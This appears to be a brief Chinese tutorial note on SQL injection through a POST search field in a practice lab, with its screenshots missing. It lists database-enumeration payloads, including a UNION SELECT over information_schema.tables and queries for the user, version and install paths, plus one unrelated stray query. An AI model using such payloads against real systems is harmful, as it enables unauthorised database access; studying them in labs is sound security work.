sql注入---sql injection post search

首先先查看请求

 

 然后查看参数

 

 然后通过查看我们接口的参数，使用接口测试工具来模拟此次内容

 

 比如我们输入存在的title

 

 Iron Man

然后我们在title字段进行sql injection

 

 

 

 然后剩余的，我们可以跟get injection search一样进行爆破了

大致内容

SELECT USER(),DATABASE()

UNION SELECT table_name,table_schema FROM information_schema.tables WHERE table_schema='boot'

SELECT a.interface_id,b.id,b.expected_results,a.response_body,a.task_mark
FROM `auto_response` a
LEFT JOIN
p_interface_auto b
ON a.interface_id=b.id
WHERE a.task_id=309 AND a.task_mark>202202220003

SELECT NOW();查询实时数据库时间 SELECT VERSION();
SELECT @@datadir;-- 打印存储的路径
SELECT @@basedir;-- 查看安装路径
SELECT @@version_compile_os;-- 查看安装系统

重要的库 information_schema跟mysql 

数据库事件   begin  commit